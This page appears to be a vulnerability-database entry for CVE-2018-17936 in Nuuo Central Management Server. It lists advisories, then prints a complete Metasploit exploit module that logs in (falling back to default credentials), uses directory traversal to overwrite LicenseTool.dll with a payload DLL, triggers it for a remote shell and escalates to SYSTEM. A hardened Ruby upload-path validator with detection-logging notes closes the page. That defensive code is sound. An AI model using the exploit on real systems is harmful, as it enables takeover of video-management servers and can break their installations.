| Title | Published | Views | Family |
|---|---|---|---|
| Nuuo Central Management Server Authenticated Arbitrary File Upload | 27 Nov 2018 00:00 | – | attackerkb |
| CVE-2018-17936 | 20 Feb 2019 13:59 | – | circl |
| NUUO CMS Code Execution Vulnerability (CNVD-2018-24251) | 29 Nov 2018 00:00 | – | cnvd |
| CVE-2018-17936 | 27 Nov 2018 21:00 | – | cve |
| CVE-2018-17936 | 27 Nov 2018 21:00 | – | cvelist |
| NUUO CMS (Update A) | 11 Oct 2018 00:00 | – | ics |
| Nuuo Central Management Server Authenticated Arbitrary File Upload | 21 Jan 2019 10:06 | – | metasploit |
| CVE-2018-17936 | 27 Nov 2018 20:29 | – | nvd |
| Nuuo Central Management Server 2.4 Authenticated Arbitrary File Upload | 20 Feb 2019 00:00 | – | packetstorm |
| Remote code execution | 27 Nov 2018 20:29 | – | prion |
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::Nuuo

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Nuuo Central Management Server Authenticated Arbitrary File Upload",
      'Description'    => %q{
        The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the
        CMS Server.
        The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\)
        characters. Therefore, this function can be abused to overwrite any files in the installation
        drive of CMS Server.
        This vulnerability is exploitable in CMS versions up to and including v2.4.
        This module will either use a provided session number (which can be guessed with an auxiliary
        module) or attempt to log in using a provided username and password - it will also try the
        default credentials if nothing is provided.
        This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module
        fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will
        not execute successfully.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Pedro Ribeiro <[email protected]>' # Vulnerability discovery and Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2018-17936' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ]
        ],
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Targets'        =>
        [
          [ 'Nuuo Central Management Server <= v2.4.0', {} ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Oct 11 2018',
      'DefaultTarget'  => 0))
  end

  def on_new_session(client)
    if client.type == 'meterpreter'
      print_warning('Please wait a bit while we clean up')
      client.sys.process.get_processes().each do |proc|
        if proc['name'] == 'NCS_Server.exe'
          client.sys.process.kill(proc['pid'])
          Rex.sleep(5)
          client.shell_command_token("move /y #{@dll} LicenseTool.dll")
          client.sys.process.execute('NCS_Server.exe')
          print_good('Successfully restored LicenseTool.dll!')
        end
      end
      # elevate privs to system (we're already Admin anyway), and we're done!
      client.run_cmd('getsystem')
      print_good('We should have SYSTEM now, enjoy your shell!')
    else
      print_error('You are not using meterpreter, so we are unable to restore LicenseTool.dll')
      print_error("To restore it, kill the NCS_Server.exe process and copy <CMS_FOLDER>\\#{@dll} to <CMS_FOLDER>\\LicenseTool.dll")
      print_error('... otherwise the Nuuo CMS installation will be nuked!')
      print_good('Anyway, enjoy your shell!')
    end
  end

  def exploit
    nucs_login
    unless @nucs_session
      fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS')
    end

    # Download and upload a backup of LicenseTool.dll, so that we can restore it at post
    # and not nuke the CMS installation.
    @dll = rand_text_alpha(12)
    print_status("Backing up LicenseTool.dll to #{@dll}")
    dll_data = nucs_download_file('LicenseTool.dll')
    nucs_upload_file(@dll, dll_data)

    print_status('Uploading payload...')
    nucs_upload_file('LicenseTool.dll', generate_payload_dll)

    print_status('Sleeping 15 seconds...')
    Rex.sleep(15)

    print_status('Sending SENDLICFILE request, shell incoming!')
    license_data = rand_text_alpha(50..350)
    nucs_send_msg(['SENDLICFILE', "FileName: #{rand_text_alpha(3..11)}.lic",
                   'Content-Length: ' + license_data.length.to_s], license_data)
  end
end
```
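The module's description states that the root cause is a `FileName` parameter which accepts `..\..\` sequences, so an authenticated client can write outside the configuration directory. The Ruby below is an added example, not code from the Nuuo CMS or from the Metasploit module: a hypothetical server-side resolver for an upload file name that normalizes backslashes to forward slashes (so Windows-style traversal is caught the same way as `../`), rejects absolute, drive-letter, NUL-containing and multi-component names, restricts the name to a conservative character set, and finally re-checks that the resolved path still lies under an assumed base directory. `UPLOAD_ROOT`, `UnsafeFileName`, `safe_upload_path` and `safe_upload_path?` are all assumptions introduced for this example.

```ruby
# Added example: a hardened resolver for an upload FileName parameter.
# Not part of the Nuuo CMS or the Metasploit module; all names are assumed.

UPLOAD_ROOT = '/var/lib/cms/config'.freeze # assumed configuration directory

class UnsafeFileName < StandardError; end

# Returns the absolute path the upload may be written to, or raises
# UnsafeFileName with a reason that can be logged as a detection signal.
def safe_upload_path(filename, root = UPLOAD_ROOT)
  raise UnsafeFileName, 'empty file name' if filename.nil? || filename.strip.empty?

  # Treat backslashes as separators so "..\..\x" is handled like "../../x".
  normalized = filename.gsub('\\', '/')

  # Reject embedded NUL bytes, which can truncate the name in native code.
  raise UnsafeFileName, 'NUL byte in file name' if normalized.include?("\0")

  # Reject absolute paths, drive letters (C:...) and UNC-style prefixes (//host/share).
  if normalized.start_with?('/') || normalized =~ /\A[A-Za-z]:/
    raise UnsafeFileName, 'absolute, drive or UNC path'
  end

  # Configuration uploads are a flat namespace here: any separator left means
  # traversal or a subdirectory, both of which are refused.
  raise UnsafeFileName, 'traversal or subdirectory' if normalized.include?('/')

  # Conservative character allow-list; also refuses ".", ".." and dot-files.
  unless normalized =~ /\A[A-Za-z0-9_-][A-Za-z0-9_.-]*\z/
    raise UnsafeFileName, 'disallowed characters in file name'
  end

  # Defense in depth: resolve the candidate and confirm it stays under root.
  root_abs  = File.expand_path(root)
  candidate = File.expand_path(normalized, root_abs)
  raise UnsafeFileName, 'resolved path escapes root' unless candidate.start_with?(root_abs + '/')

  candidate
end

# Boolean convenience wrapper for callers that only need accept/reject.
def safe_upload_path?(filename, root = UPLOAD_ROOT)
  safe_upload_path(filename, root)
  true
rescue UnsafeFileName
  false
end
```

Each rejection carries a distinct reason so the server can log which rule fired; a burst of `traversal or subdirectory` rejections on one session is the kind of event a monitoring rule for this class of bug would key on. If subdirectories were a legitimate requirement, the separator check would become a per-component check, and the final root-prefix comparison is the rule that still has to hold.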